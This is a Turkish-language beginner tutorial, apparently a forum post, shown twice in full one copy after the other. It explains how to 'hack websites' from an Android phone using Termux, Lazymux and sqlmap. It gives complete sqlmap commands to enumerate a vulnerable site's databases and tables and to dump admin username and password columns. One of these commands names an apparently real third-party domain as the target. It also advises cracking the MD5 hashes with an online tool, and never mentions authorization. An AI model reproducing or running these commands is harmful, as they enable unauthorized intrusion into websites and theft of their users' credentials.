Selamun aleykum devrelerim sizlere android telefonunuz yada tabletiniz ile nasil website hackleyebileceginizi anlaticam
Not: Programda linux komutlari kullaniliyor
Google play 'a girip termux uygulamasini indiriyoruz daha sonra uygulamayi açıyoruz.
Uygulamayi açtiktan sonra biraz bekleyecek daha sonra komut ekrani gelecek
Komut satiri geldi simdi yapmamiz gereken şunlar ;
1-)apt update (uygulamayi günceller ve bunu birkere yaparsiniz)
2) pkg install git (bu komut ise git ' i kurar bunun sayesinde github sitesinden linux tabanli programlari klonlayabilir yani indirebilirsiniz)
3-)pkg install python (Bu komut en önemli komuttur çünkü bu komut sayesinde linux programlarini çaliştirabilirsiniz (.sh vs istisna) )
4-)pkg install python2(Bu komut python2 yi kurar bazı linux programlari python 'un yüksek sürümünü kullanir oyüzden bunuda kurmak şart )
Paketi kurmak için izin isteyecektir ( [Y/N] ) kurmak için Y yazip enter ' a basın)
Şimdi sıra web-hacking (website hacklemek için kullanicagimiz programlari kurmak)
Kurmak için git clone (kuracagimiz programin github adresi)
Bizim kuracagimiz program lazymux olacak.Lazymux nedir diye sorarsaniz
lazymux linux hack araçlarini içinde bulunduran dilediginizi kurmanizi saglayan program
Şimdi nasil kurulacagini anlatiyorum
Kurmak için git clone komutunu kullanacagiz
git clone https://github.com/Gameye98/Lazymux.git (yazip enter)
Daha sonra size yukarida bahsettiğim gibi Y/N paket kurulsun mu diye soracak
siz Y yazıp enter 'a basin paket kurulduktan sonra yazacagimiz komutlar şöyle
$: cd (komut satirina cd yazip enter)
$: ls (komut satirina ls yazip enter)
Komut satirina ls yazip enter 'a bastiğınız zaman şöyle bir şey belirecek
Lazymux
Bu git clone ile yüklediğimiz program olan lazymux programinin klasörü
Klasörü açmak için ;
$: cd Lazymux (komut satirina yazip enter)
$: ls (komut satirina yazip enter)
Ls yazdiktan sonra bizi ilgilendiren dosya şu olacak
lazymux.py
Bu dosya web siteleri hacklemek için kullanacagimiz programlari indirmemizi saglayacak
programi calistirmak için
$: python2 lazymux.py (komut satirina yazip enter)
Karsimiza şöyle bir ekran gelecek ;
[IMG]
Burada seçim yapmak için seçeneklerin numarasi kullanilir
Örn;
01 : İnformation gathering
Bizim indirecegimiz program 05 yani web-hacking bölümünde
altta bulunan
lzmx> 05 yazip enter 'a bssiyoruz
Karşımıza birsürü program çıkıcak bizim kullanacagimiz program sqlmap programi (eger isterseniz baska programda yukleyebilirsiniz fakat sql injection yapamazsiniz wordpressscan xsheel vs vs)
Sqlmap programi ilk sirada olsudugu için 01 yazip enter 'a basiyoruz
Enter 'a bastiktan sonra size yine (Y/N) sorabilir Y yazip enter 'a basin program baya geniş çapli oldugu için receivering objects bölümünde yüklenmesi biraz uzun sürecektir.
Program yüklendikten sonra
[99] back to menu
[00] exit lazymux
yazisi çıkacak biz 00 yazip enter ' a basiyoruz ve lazymux programindan çikiyoruz
programdan çıktıktan sonra komut satırına ;
$: cd
$: ls
Daha sonra slmap klasörü görünecek
Lazymux . sqlmap
Biz sqlmap klasörüne gireceğiz
Klasöre girmek için komut satırına
$: cd sqlmap
$: ls
yazdiktan sonra yine sqlmap 'a ait doayalar görünecek bize lazim olan dosya ise;
sqlmap.py
Şimdi çalistirmadan önce nasil kullanacaginizi anlatiyim
İlk yapacagimiz işlem. şöyle ;
Sql açığı tespit ettiğiniz sitenin database sine girecegiz
Bunun için
komut satırına şu kodlari yaziyoruz ;
python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
hedef sitenin sql acigi buldugunuz bölümün url sini giriniz örnek ;
http://www.site.com/index.php?id=41
yukaridaki komutu girip enter 'a bastiginiz anda sql açıklı websitesini tarayıp database ' sine girecektir.(tarama biraz uzun sürebilir)
Tarama bittikten sonra databaseler ekrana gelecektir ;
[+]information_schema
[+]w3bdb
Databaseden tablolari cekmek icin komut satirina ;
$: python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=41" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databaseismi --tables
Yukaridaki komutu yazdiktan sonra size databasede bulunan tablolari listeleyecektir bu liste çok uzun olabilir ve admin bilgilerini bulmanizi zorlastirabilir
Örnek
information_schema da bulunan tablolar
-------------------------------
TABLE_NAMES
USER_PRİVİLEGES
vsvs
---------------------------
Diyelimki admin user pass olan tabloyu buldunuz
Tablodaki verileri çekmek için ise ;
komut satırına ;
$: python2 sqlmap.py -u "http://cordoganclark.com/newsitem.php?id=8" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D databaseismi -T tabloismi -C username,password --dump
Bu komutu yaziyorsunuz sizde veri isimleri değişik olabilir ben örnek olarak yazdim
ekrana şöyle bir çıktı geldi varsayalim ;
-------------------------------------
username . a2dbnsjeia245
password. 243ma2134666
------------------------------------
Böyle bir sonuç çikarsa hash killer ile md5 şifrelenmis bilgileri bulabilirsiniz
Admin paneli bulmak için yüklediğimiz lazymux programinda mevcut programlar var onlari kullanabilirsiniz.
Umarım yararli olmuştur.Yazım hatalarim varsa özür dilerim
Not: Programda linux komutlari kullaniliyor
Google play 'a girip termux uygulamasini indiriyoruz daha sonra uygulamayi açıyoruz.
Uygulamayi açtiktan sonra biraz bekleyecek daha sonra komut ekrani gelecek
Komut satiri geldi simdi yapmamiz gereken şunlar ;
1-)apt update (uygulamayi günceller ve bunu birkere yaparsiniz)
2) pkg install git (bu komut ise git ' i kurar bunun sayesinde github sitesinden linux tabanli programlari klonlayabilir yani indirebilirsiniz)
3-)pkg install python (Bu komut en önemli komuttur çünkü bu komut sayesinde linux programlarini çaliştirabilirsiniz (.sh vs istisna) )
4-)pkg install python2(Bu komut python2 yi kurar bazı linux programlari python 'un yüksek sürümünü kullanir oyüzden bunuda kurmak şart )
Paketi kurmak için izin isteyecektir ( [Y/N] ) kurmak için Y yazip enter ' a basın)
Şimdi sıra web-hacking (website hacklemek için kullanicagimiz programlari kurmak)
Kurmak için git clone (kuracagimiz programin github adresi)
Bizim kuracagimiz program lazymux olacak.Lazymux nedir diye sorarsaniz
lazymux linux hack araçlarini içinde bulunduran dilediginizi kurmanizi saglayan program
Şimdi nasil kurulacagini anlatiyorum
Kurmak için git clone komutunu kullanacagiz
git clone https://github.com/Gameye98/Lazymux.git (yazip enter)
Daha sonra size yukarida bahsettiğim gibi Y/N paket kurulsun mu diye soracak
siz Y yazıp enter 'a basin paket kurulduktan sonra yazacagimiz komutlar şöyle
$: cd (komut satirina cd yazip enter)
$: ls (komut satirina ls yazip enter)
Komut satirina ls yazip enter 'a bastiğınız zaman şöyle bir şey belirecek
Lazymux
Bu git clone ile yüklediğimiz program olan lazymux programinin klasörü
Klasörü açmak için ;
$: cd Lazymux (komut satirina yazip enter)
$: ls (komut satirina yazip enter)
Ls yazdiktan sonra bizi ilgilendiren dosya şu olacak
lazymux.py
Bu dosya web siteleri hacklemek için kullanacagimiz programlari indirmemizi saglayacak
programi calistirmak için
$: python2 lazymux.py (komut satirina yazip enter)
Karsimiza şöyle bir ekran gelecek ;
[IMG]
Burada seçim yapmak için seçeneklerin numarasi kullanilir
Örn;
01 : İnformation gathering
Bizim indirecegimiz program 05 yani web-hacking bölümünde
altta bulunan
lzmx> 05 yazip enter 'a bssiyoruz
Karşımıza birsürü program çıkıcak bizim kullanacagimiz program sqlmap programi (eger isterseniz baska programda yukleyebilirsiniz fakat sql injection yapamazsiniz wordpressscan xsheel vs vs)
Sqlmap programi ilk sirada olsudugu için 01 yazip enter 'a basiyoruz
Enter 'a bastiktan sonra size yine (Y/N) sorabilir Y yazip enter 'a basin program baya geniş çapli oldugu için receivering objects bölümünde yüklenmesi biraz uzun sürecektir.
Program yüklendikten sonra
[99] back to menu
[00] exit lazymux
yazisi çıkacak biz 00 yazip enter ' a basiyoruz ve lazymux programindan çikiyoruz
programdan çıktıktan sonra komut satırına ;
$: cd
$: ls
Daha sonra slmap klasörü görünecek
Lazymux . sqlmap
Biz sqlmap klasörüne gireceğiz
Klasöre girmek için komut satırına
$: cd sqlmap
$: ls
yazdiktan sonra yine sqlmap 'a ait doayalar görünecek bize lazim olan dosya ise;
sqlmap.py
Şimdi çalistirmadan önce nasil kullanacaginizi anlatiyim
İlk yapacagimiz işlem. şöyle ;
Sql açığı tespit ettiğiniz sitenin database sine girecegiz
Bunun için
komut satırına şu kodlari yaziyoruz ;
python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
hedef sitenin sql acigi buldugunuz bölümün url sini giriniz örnek ;
http://www.site.com/index.php?id=41
yukaridaki komutu girip enter 'a bastiginiz anda sql açıklı websitesini tarayıp database ' sine girecektir.(tarama biraz uzun sürebilir)
Tarama bittikten sonra databaseler ekrana gelecektir ;
[+]information_schema
[+]w3bdb
Databaseden tablolari cekmek icin komut satirina ;
$: python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=41" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databaseismi --tables
Yukaridaki komutu yazdiktan sonra size databasede bulunan tablolari listeleyecektir bu liste çok uzun olabilir ve admin bilgilerini bulmanizi zorlastirabilir
Örnek
information_schema da bulunan tablolar
-------------------------------
TABLE_NAMES
USER_PRİVİLEGES
vsvs
---------------------------
Diyelimki admin user pass olan tabloyu buldunuz
Tablodaki verileri çekmek için ise ;
komut satırına ;
$: python2 sqlmap.py -u "http://cordoganclark.com/newsitem.php?id=8" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D databaseismi -T tabloismi -C username,password --dump
Bu komutu yaziyorsunuz sizde veri isimleri değişik olabilir ben örnek olarak yazdim
ekrana şöyle bir çıktı geldi varsayalim ;
-------------------------------------
username . a2dbnsjeia245
password. 243ma2134666
------------------------------------
Böyle bir sonuç çikarsa hash killer ile md5 şifrelenmis bilgileri bulabilirsiniz
Admin paneli bulmak için yüklediğimiz lazymux programinda mevcut programlar var onlari kullanabilirsiniz.
Umarım yararli olmuştur.Yazım hatalarim varsa özür dilerim